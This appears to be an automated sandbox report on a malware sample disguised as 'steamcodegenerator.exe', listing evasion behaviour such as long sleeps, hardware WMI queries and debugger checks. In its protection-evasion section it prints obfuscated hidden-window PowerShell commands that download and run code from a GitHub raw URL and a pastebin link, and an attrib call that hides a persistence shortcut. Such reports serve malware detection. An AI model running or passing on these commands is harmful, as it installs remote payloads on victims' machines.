Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588047Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590750Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591110
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3593Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1673Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4226Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2140Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1054Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 613Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4592Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1458Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5074
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2523
Source: C:\Users\user\Desktop\steamcodegenerator.exeAPI coverage: 8.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep count: 3593 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep count: 1673 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -588047s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272Thread sleep count: 1054 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 613 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5284Thread sleep count: 4592 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032Thread sleep count: 1458 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -590750s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1744Thread sleep count: 970 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep count: 313 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 192 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep count: 5074 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep count: 2523 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep count: 38 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep count: 199 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep count: 63 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1420Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052Thread sleep time: -591110s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663560478 FindFirstFileExW,0_2_00007FF663560478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588047Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590750Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591110
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF308D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF66354998C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF66354998C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF66356483C GetProcessHeap,0_2_00007FF66356483C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663549B30 SetUnhandledExceptionFilter,0_2_00007FF663549B30
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF66354998C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF66354998C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663551D58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF663551D58
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF6635495DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6635495DC

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\steamcodegenerator.exeNtMapViewOfSection: Indirect: 0x22AF4E1835DJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeNtMapViewOfSection: Indirect: 0x22AF4E1889AJump to behavior
Source: C:\Users\user\Desktop\steamcodegenerator.exeNtUnmapViewOfSection: Indirect: 0x22AF4E1882EJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF663568F80 cpuid 0_2_00007FF663568F80
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF663564524
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF66355B378
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF663564340
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF6635643F0
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF663563ADC
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF6635641E8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF663563FA0
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF66355B7F8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF663563E38
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF663563F08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
